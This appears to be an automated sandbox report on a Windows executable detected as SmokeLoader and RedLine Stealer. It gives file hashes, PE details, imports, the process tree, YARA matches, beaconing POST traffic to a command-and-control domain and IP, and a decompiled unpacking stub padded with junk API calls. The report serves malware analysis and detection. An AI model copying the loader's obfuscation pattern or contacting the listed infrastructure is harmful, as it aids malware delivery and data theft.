Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.969285988131741
TrID:	Win32 Executable (generic) a (10002005/4) 99.83% Windows Screen Saver (13104/52) 0.13% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	P2SMn3jloH.exe
File size:	215552
MD5:	0779f7b34e9079944427b8260b49c205
SHA1:	31f2cf1dc970fdfaf51b9aab2c9e0b9715fb53ec
SHA256:	5c7ff5f2993bdb60d15a567dfaef41dcd30875d6629f2775acdb190e01dcef87
SHA512:	e22e6186f82a3eb329874c246a9d64cc45ede3a6ee93447dcdc3e93cb0c52a40b9cfb36e0350e1cdc1487d47bb94d3478b49376c2de5c64a82da545c2c976b3e
SSDEEP:	3072:zmRA4EwqbftQPtRLlTsLxmE6pf5ADM8VGQqf/r4nnFxtHglCFBQx:zmyHbFeRRILgEFI8sfTuxtHMOq
TLSH:	D424CF233AD0C073E27E92758815D7B55A7BB87405365A8B3BE8567C8F313D2AE2434B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L.^.".^.".^.".@...C.".@.....".y.Y.Y.".^.#...".@...l.".@..._.".@..._.".Rich^.".........PE..L...#H.a..................... .....

File Icon


Icon Hash:	aaf8c8eaa2e4a0c1

Static PE Info

General

Entrypoint:	0x4094f6
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x61884823 [Sun Nov 7 21:41:55 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	8fb85d04360d27123c3a8e1c2ffb7f7e

Entrypoint Preview

Instruction
call 00007F1E44C53682h
jmp 00007F1E44C4B66Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
test eax, eax
je 00007F1E44C4B804h
sub eax, 08h
cmp dword ptr [eax], 0000DDDDh
jne 00007F1E44C4B7F9h
push eax
call 00007F1E44C4ACC2h
pop ecx
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 00000000h
test eax, eax
jne 00007F1E44C4B855h
call 00007F1E44C50160h
mov dword ptr [esi+08h], eax
mov ecx, dword ptr [eax+6Ch]
mov dword ptr [esi], ecx
mov ecx, dword ptr [eax+68h]
mov dword ptr [esi+04h], ecx
mov ecx, dword ptr [esi]
cmp ecx, dword ptr [004312D8h]
je 00007F1E44C4B804h
mov ecx, dword ptr [004311F0h]
test dword ptr [eax+70h], ecx
jne 00007F1E44C4B7F9h
call 00007F1E44C4CA01h
mov dword ptr [esi], eax
mov eax, dword ptr [esi+04h]
cmp eax, dword ptr [004310F8h]
je 00007F1E44C4B808h
mov eax, dword ptr [esi+08h]
mov ecx, dword ptr [004311F0h]
test dword ptr [eax+70h], ecx
jne 00007F1E44C4B7FAh
call 00007F1E44C538B9h
mov dword ptr [esi+04h], eax
mov eax, dword ptr [esi+08h]
test byte ptr [eax+70h], 00000002h
jne 00007F1E44C4B806h
or dword ptr [eax+70h], 02h
mov byte ptr [esi+0Ch], 00000001h
jmp 00007F1E44C4B7FCh
mov ecx, dword ptr [eax]
mov dword ptr [esi], ecx
mov eax, dword ptr [eax+04h]
mov dword ptr [esi+04h], eax
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword ptr [004307FCh]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
push esi
xor ebx, ebx

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1e7e4	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x18b000	0x4310	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1280	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x4348	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x220	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1e44a	0x1e600	False	0.5128600823045267	data	6.400320083175456	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x20000	0x16ade4	0x11c00	False	0.8920417033450704	data	7.6284485167398906	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x18b000	0x4310	0x4400	False	0.6488970588235294	data	6.048423243299262	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RIWEZOZAC	0x18e700	0x55f	ASCII text, with very long lines (1375), with no line terminators	Romanian	Romania
RT_ICON	0x18b330	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania
RT_ICON	0x18bbd8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Romanian	Romania
RT_ICON	0x18c2a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania
RT_ICON	0x18c808	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania
RT_ICON	0x18d8b0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Romanian	Romania
RT_ICON	0x18e238	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania
RT_STRING	0x18ee08	0xb6	data	Romanian	Romania
RT_STRING	0x18eec0	0x2ae	data	Romanian	Romania
RT_STRING	0x18f170	0x19c	data	Romanian	Romania
RT_ACCELERATOR	0x18ec60	0x58	data	Romanian	Romania
RT_GROUP_ICON	0x18e6a0	0x5a	data	Romanian	Romania
RT_VERSION	0x18ecb8	0x14c	Intel 80386 COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Imports

DLL	Import
KERNEL32.dll	LocalSize, InterlockedExchange, GetTickCount, CopyFileExA, GetConsoleAliasExesLengthW, EnumSystemCodePagesA, TlsGetValue, MoveFileWithProgressA, VerifyVersionInfoW, LocalUnlock, DebugBreak, GlobalGetAtomNameA, MapViewOfFileEx, GetWindowsDirectoryA, GetModuleHandleA, lstrlenW, GlobalDeleteAtom, SizeofResource, WriteConsoleInputA, CopyFileW, SetWaitableTimer, GetVersionExA, FindResourceW, OpenEventA, SearchPathA, GetThreadPriority, CallNamedPipeA, GetProcAddress, GlobalAlloc, SetFileTime, GetConsoleAliasesLengthA, GetComputerNameA, GetSystemWindowsDirectoryA, GetMailslotInfo, GetTapeParameters, OpenJobObjectW, GetPrivateProfileIntA, ReadConsoleInputW, _lread, LockFile, GetPrivateProfileStructW, GetDiskFreeSpaceExW, DefineDosDeviceW, GetACP, SetProcessAffinityMask, GlobalFindAtomW, InterlockedDecrement, VerifyVersionInfoA, CreateActCtxW, FindNextVolumeA, GetComputerNameW, CancelDeviceWakeupRequest, EnumCalendarInfoA, InterlockedCompareExchange, GetPrivateProfileStructA, EnumCalendarInfoW, EnterCriticalSection, InterlockedIncrement, GetNamedPipeHandleStateW, AreFileApisANSI, LoadLibraryA, SetLastError, WriteConsoleW, GetVolumeInformationA, OpenFileMappingA, LoadLibraryW, Sleep, InitializeCriticalSection, DeleteCriticalSection, LeaveCriticalSection, RtlUnwind, RaiseException, GetLastError, HeapFree, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapReAlloc, HeapAlloc, MoveFileA, DeleteFileA, GetStartupInfoW, LCMapStringA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetCPInfo, GetModuleHandleW, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, HeapCreate, VirtualFree, VirtualAlloc, HeapSize, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, SetHandleCount, GetFileType, GetStartupInfoA, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetOEMCP, IsValidCodePage, GetLocaleInfoA, GetStringTypeA, GetStringTypeW, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, InitializeCriticalSectionAndSpinCount, SetFilePointer, GetConsoleCP, GetConsoleMode, GetLocaleInfoW, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CloseHandle, CreateFileA
GDI32.dll	GetCharWidthA
ADVAPI32.dll	SetThreadToken

Possible Origin

Language of compilation system	Country where language is spoken	Map
Romanian	Romania

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2022 12:26:08.621563911 CET	49699	80	192.168.2.3	87.251.79.60
Nov 3, 2022 12:26:08.715183020 CET	80	49699	87.251.79.60	192.168.2.3
Nov 3, 2022 12:26:08.715354919 CET	49699	80	192.168.2.3	87.251.79.60
Nov 3, 2022 12:26:08.715487957 CET	49699	80	192.168.2.3	87.251.79.60
Nov 3, 2022 12:26:08.715517044 CET	49699	80	192.168.2.3	87.251.79.60
Nov 3, 2022 12:26:08.810715914 CET	80	49699	87.251.79.60	192.168.2.3
Nov 3, 2022 12:26:09.114351034 CET	49699	80	192.168.2.3	87.251.79.60
Nov 3, 2022 12:26:09.205801010 CET	80	49699	87.251.79.60	192.168.2.3
Nov 3, 2022 12:26:09.238164902 CET	80	49699	87.251.79.60	192.168.2.3
Nov 3, 2022 12:26:09.240447044 CET	49699	80	192.168.2.3	87.251.79.60
Nov 3, 2022 12:26:09.551862001 CET	49699	80	192.168.2.3	87.251.79.60
Nov 3, 2022 12:26:09.559798956 CET	80	49699	87.251.79.60	192.168.2.3
Nov 3, 2022 12:26:09.559859037 CET	49699	80	192.168.2.3	87.251.79.60
Nov 3, 2022 12:26:09.727560043 CET	80	49699	87.251.79.60	192.168.2.3
Nov 3, 2022 12:26:09.727715015 CET	49699	80	192.168.2.3	87.251.79.60
Nov 3, 2022 12:26:10.161276102 CET	49699	80	192.168.2.3	87.251.79.60
Nov 3, 2022 12:26:10.251888990 CET	80	49699	87.251.79.60	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 3, 2022 12:26:08.155019999 CET	49977	53	192.168.2.3	8.8.8.8
Nov 3, 2022 12:26:08.616261959 CET	53	49977	8.8.8.8	192.168.2.3
Nov 3, 2022 12:26:09.253171921 CET	57840	53	192.168.2.3	8.8.8.8
Nov 3, 2022 12:26:10.239569902 CET	57840	53	192.168.2.3	8.8.8.8
Nov 3, 2022 12:26:11.279532909 CET	57840	53	192.168.2.3	8.8.8.8
Nov 3, 2022 12:26:13.280474901 CET	53	57840	8.8.8.8	192.168.2.3
Nov 3, 2022 12:26:14.267415047 CET	53	57840	8.8.8.8	192.168.2.3
Nov 3, 2022 12:26:16.298055887 CET	53	57840	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Nov 3, 2022 12:26:14.267613888 CET	192.168.2.3	8.8.8.8	cff6	(Port unreachable)	Destination Unreachable
Nov 3, 2022 12:26:16.298300982 CET	192.168.2.3	8.8.8.8	cff6	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 3, 2022 12:26:08.155019999 CET	192.168.2.3	8.8.8.8	0x2a3b	Standard query (0)	host-file-host6.com	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:26:09.253171921 CET	192.168.2.3	8.8.8.8	0x6e7e	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:26:10.239569902 CET	192.168.2.3	8.8.8.8	0x6e7e	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:26:11.279532909 CET	192.168.2.3	8.8.8.8	0x6e7e	Standard query (0)	host-host-file8.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 3, 2022 12:26:08.616261959 CET	8.8.8.8	192.168.2.3	0x2a3b	No error (0)	host-file-host6.com		87.251.79.60	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:26:13.280474901 CET	8.8.8.8	192.168.2.3	0x6e7e	Server failure (2)	host-host-file8.com	none	none	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:26:14.267415047 CET	8.8.8.8	192.168.2.3	0x6e7e	Server failure (2)	host-host-file8.com	none	none	A (IP address)	IN (0x0001)	false
Nov 3, 2022 12:26:16.298055887 CET	8.8.8.8	192.168.2.3	0x6e7e	Server failure (2)	host-host-file8.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

dcihclar.com

host-file-host6.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49699	87.251.79.60	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:26:08.715487957 CET	103	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dcihclar.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 229 Host: host-file-host6.com
Nov 3, 2022 12:26:08.715517044 CET	104	OUT	Data Raw: 10 87 82 99 1a f1 d0 b2 cd 3d 7d 34 77 c9 e3 89 31 1e d8 34 a0 43 6c 9d cb ee dd f6 f9 d3 e3 80 6d c1 55 d2 6c 1a cc e6 ec a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 52 a1 90 21 Data Ascii: =}4w14ClmUlwmFu$f]dR!@iw4WBYTomqZ#Qil^fV@eq@kSr6VTQdlOWCj@c\\|.J\g^yGrr79^+
Nov 3, 2022 12:26:09.114351034 CET	104	OUT	Data Raw: 10 87 82 99 1a f1 d0 b2 cd 3d 7d 34 77 c9 e3 89 31 1e d8 34 a0 43 6c 9d cb ee dd f6 f9 d3 e3 80 6d c1 55 d2 6c 1a cc e6 ec a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 52 a1 90 21 Data Ascii: =}4w14ClmUlwmFu$f]dR!@iw4WBYTomqZ#Qil^fV@eq@kSr6VTQdlOWCj@c\\|.J\g^yGrr79^+
Nov 3, 2022 12:26:09.238164902 CET	104	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 03 Nov 2022 11:26:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a Data Ascii: fYour IP blocked0
Nov 3, 2022 12:26:09.559798956 CET	105	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Thu, 03 Nov 2022 11:26:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Data Raw: 66 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a Data Ascii: fYour IP blocked0

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: P2SMn3jloH.exePID: 4020, Parent PID: 3452

General

Target ID:	0
Start time:	12:25:04
Start date:	03/11/2022
Path:	C:\Users\user\Desktop\P2SMn3jloH.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\P2SMn3jloH.exe
Imagebase:	0x400000
File size:	215552 bytes
MD5 hash:	0779F7B34E9079944427B8260B49C205
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.254069978.00000000005E9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: P2SMn3jloH.exePID: 3420, Parent PID: 4020

General

Target ID:	1
Start time:	12:25:05
Start date:	03/11/2022
Path:	C:\Users\user\Desktop\P2SMn3jloH.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\P2SMn3jloH.exe
Imagebase:	0x400000
File size:	215552 bytes
MD5 hash:	0779F7B34E9079944427B8260B49C205
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.350515025.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000002.350312010.0000000000420000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 3452, Parent PID: 3420

General

Target ID:	2
Start time:	12:25:11
Start date:	03/11/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff69fe90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000000.338679207.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000000.338679207.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: utisvaaPID: 1280, Parent PID: 1080

General

Target ID:	12
Start time:	12:26:08
Start date:	03/11/2022
Path:	C:\Users\user\AppData\Roaming\utisvaa
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\utisvaa
Imagebase:	0x400000
File size:	215552 bytes
MD5 hash:	0779F7B34E9079944427B8260B49C205
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.395157811.00000000006D8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 46%, ReversingLabs Detection: 35%, Virustotal, Browse
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: utisvaaPID: 5332, Parent PID: 1280

General

Target ID:	13
Start time:	12:26:11
Start date:	03/11/2022
Path:	C:\Users\user\AppData\Roaming\utisvaa
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\utisvaa
Imagebase:	0x400000
File size:	215552 bytes
MD5 hash:	0779F7B34E9079944427B8260B49C205
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.409013280.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000D.00000002.408977758.0000000001F30000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000D.00000002.408977758.0000000001F30000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: P2SMn3jloH.exePID: 4020, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	5.2%
Dynamic/Decrypted Code Coverage:	3.9%
Signature Coverage:	6.7%
Total number of Nodes:	1545
Total number of Limit Nodes:	22

Executed Functions

Function 00405467 Relevance: 100.1, APIs: 52, Strings: 5, Instructions: 306
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00405467(void* __ecx) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				struct _FILETIME _v28;
				struct _FILETIME _v36;
				union _ULARGE_INTEGER _v44;
				struct _FILETIME _v52;
				union _ULARGE_INTEGER _v60;
				union _ULARGE_INTEGER _v68;
				struct _INPUT_RECORD _v88;
				struct _CRITICAL_SECTION _v92;
				struct _CRITICAL_SECTION _v116;
				intOrPtr _v120;
				char _v124;
				struct _OSVERSIONINFOEXA _v288;
				void _v1312;
				char _v2336;
				short _v3360;
				int _t57;
				void* _t112;
				void* _t114;
				void* _t117;
				void* _t118;
				void* _t119;
				CHAR* _t121;
				void* _t122;
				void* _t123;
				void* _t124;
				intOrPtr* _t125;

				_t112 = __ecx;
				_t117 = 0;
				L1:
				L1:
				if(_t117 < 0x214cd) {
					SetLastError(0);
					GetTickCount();
				}
				if(_t117 <= 0x1e9d5e41 || _v8 == 0xad5cf7 || _v120 == 0xad4c41c) {
					goto L6;
				}
				L7:
				_t118 = 0;
				do {
					if(_t118 == 0x420) {
						 *0x588f80 =  *0x588f80 + 0x38d6;
					}
					if( *0x588f80 == 0x7a) {
						LoadLibraryA("Cixofarifozehuv rilivavihe rofa juyunevame");
					}
					_t118 = _t118 + 1;
				} while (_t118 < 0x40dece);
				E00405453();
				_t119 = 0;
				if( *0x588f80 > 0) {
					do {
						E00405224(_t119);
						if( *0x588f80 == 0x1f) {
							AreFileApisANSI();
							GetNamedPipeHandleStateW(0,  &_v12,  &_v16,  &_v20,  &_v8,  &_v3360, 0);
							InterlockedIncrement(0);
						}
						_t119 = _t119 + 1;
					} while (_t119 <  *0x588f80);
				}
				_t114 = 0x5aedbe7;
				do {
					if( *0x588f80 == 0x2f3) {
						__imp__GetConsoleAliasExesLengthW();
						EnumCalendarInfoW(0, 0, 0, 0);
						InterlockedExchange( &_v12, 0);
						GetPrivateProfileStructA(0, 0,  &_v1312, 0, 0);
						EnterCriticalSection( &_v92);
						InterlockedCompareExchange(0, 0, 0);
						EnumCalendarInfoA(0, 0, 0, 0);
						LocalUnlock(0);
						CancelDeviceWakeupRequest(0);
						GetComputerNameW( &_v3360,  &_v16);
						EnterCriticalSection( &_v116);
					}
					_t114 = _t114 - 1;
				} while (_t114 != 0);
				_v8 = 0;
				_t121 = "VirtualProtect";
				do {
					if( *0x588f80 == 0x2e) {
						GetModuleHandleA(0);
					}
					if(_v8 == 0x76069) {
						 *0x5873fc = GetModuleHandleA(_t121);
					}
					_v8 = _v8 + 1;
				} while (_v8 < 0x1756bb);
				"VirtualProtect" = 0;
				 *0x431ac4 = GetProcAddress( *0x5873fc, _t121);
				_t122 = 0;
				do {
					if(_t122 == 0x1c) {
						E00405355(_t112); // executed
					}
					_t122 = _t122 + 1;
				} while (_t122 < 0x3debc7);
				_t57 = E004051A8( *0x5838fc,  *0x588f80, 0x420010);
				_t123 = 0;
				do {
					if( *0x588f80 == 0x10) {
						InterlockedIncrement( &_v12);
						_t57 = GetCharWidthA(0, 0, 0, 0);
					}
					if(_t123 == 0x1e674) {
						_t57 = E00405347(_t57);
					}
					_t123 = _t123 + 1;
				} while (_t123 < 0x3e4e2);
				_t124 = 0xdd7b3;
				do {
					if( *0x588f80 == 0x21) {
						SetThreadToken(0, 0);
					}
					_t124 = _t124 - 1;
				} while (_t124 != 0);
				E00404F21();
				_t125 = __imp__MoveFileWithProgressA;
				if( *0x588f80 == 0x1144) {
					__imp__FindNextVolumeA(0, 0, 0);
					GetModuleHandleA("Lef tibiwuhafibir");
					__imp__CreateActCtxW( &_v124);
					VerifyVersionInfoA( &_v288, 0, 0);
					InterlockedDecrement(0);
					InterlockedIncrement(0);
					 *_t125(0, 0, 0, 0, 0, 0);
				}
				if( *0x588f80 == 0x1d) {
					WriteConsoleW(0, 0, 0,  &_v12, 0);
					GlobalFindAtomW(L"jijozumadik");
					LoadLibraryW(0);
					 *_t125(0, 0, 0, 0, 0);
					SetProcessAffinityMask(0, 0);
					GetACP();
					DefineDosDeviceW(0, 0, 0);
					GetDiskFreeSpaceExW(0,  &_v60,  &_v68,  &_v44);
					InterlockedExchange( &_v16, 0);
					GetPrivateProfileStructW(0, 0,  &_v1312, 0, 0);
					LockFile(0, 0, 0, 0, 0);
					_lread(0, 0, 0);
					ReadConsoleInputW(0,  &_v88, 0,  &_v20);
					GetPrivateProfileIntA(0, 0, 0, 0);
					__imp__OpenJobObjectW(0, 0, L"Lipafi goleheriziv");
					GetTapeParameters(0, 0,  &_v8, 0);
					GetMailslotInfo(0, 0, 0, 0, 0);
					CopyFileW(0, 0, 0);
					__imp__GetSystemWindowsDirectoryA( &_v2336, 0);
					OpenFileMappingA(0, 0, 0);
					__imp__GetConsoleAliasesLengthA(0);
					SetFileTime(0,  &_v36,  &_v52,  &_v28);
				}
				L00405341();
				return 0;
				L6:
				_t117 = _t117 + 1;
				if(_t117 < 0x91be26a3) {
					goto L1;
				}
				goto L7;
			}

0x00405467
0x00405474
0x00000000
0x00405476
0x0040547c
0x0040547f
0x00405485
0x00405485
0x00405491
0x00000000
0x00000000
0x004054ae
0x004054ae
0x004054b0
0x004054b6
0x004054bd
0x004054bd
0x004054ca
0x004054d1
0x004054d1
0x004054d7
0x004054d8
0x004054e0
0x004054e5
0x004054ed
0x004054ef
0x004054f0
0x004054fc
0x004054fe
0x0040551d
0x00405524
0x00405524
0x0040552a
0x0040552b
0x004054ef
0x0040553a
0x0040553f
0x00405549
0x0040554b
0x00405555
0x00405560
0x00405571
0x0040557b
0x00405580
0x0040558a
0x00405591
0x00405598
0x004055a9
0x004055b3
0x004055b3
0x004055b5
0x004055b5
0x004055be
0x004055c1
0x004055c6
0x004055cd
0x004055d0
0x004055d0
0x004055d9
0x004055de
0x004055de
0x004055e3
0x004055e6
0x004055f6
0x00405602
0x00405607
0x00405609
0x0040560c
0x0040560e
0x0040560e
0x00405613
0x00405614
0x0040562d
0x00405632
0x00405634
0x0040563b
0x00405641
0x0040564b
0x0040564b
0x00405657
0x00405659
0x00405659
0x0040565e
0x0040565f
0x00405667
0x0040566c
0x00405673
0x00405677
0x00405677
0x0040567d
0x0040567d
0x00405680
0x0040568f
0x00405695
0x0040569a
0x004056a5
0x004056ab
0x004056bb
0x004056c2
0x004056c9
0x004056d4
0x004056d4
0x004056de
0x004056ec
0x004056f7
0x004056fe
0x00405709
0x0040570d
0x00405713
0x0040571c
0x0040572f
0x0040573a
0x0040574b
0x00405756
0x0040575f
0x0040576f
0x00405779
0x00405786
0x00405793
0x0040579e
0x004057a7
0x004057b5
0x004057be
0x004057c5
0x004057d8
0x004057d8
0x004057de
0x004057e8
0x004054a5
0x004054a5
0x004054ac
0x00000000
0x00000000
0x00000000

APIs

SetLastError.KERNEL32(00000000), ref: 0040547F
GetTickCount.KERNEL32 ref: 00405485
LoadLibraryA.KERNEL32(Cixofarifozehuv rilivavihe rofa juyunevame), ref: 004054D1
AreFileApisANSI.KERNEL32 ref: 004054FE
GetNamedPipeHandleStateW.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0040551D
InterlockedIncrement.KERNEL32(00000000), ref: 00405524
GetConsoleAliasExesLengthW.KERNEL32 ref: 0040554B
EnumCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00405555
InterlockedExchange.KERNEL32(?,00000000), ref: 00405560
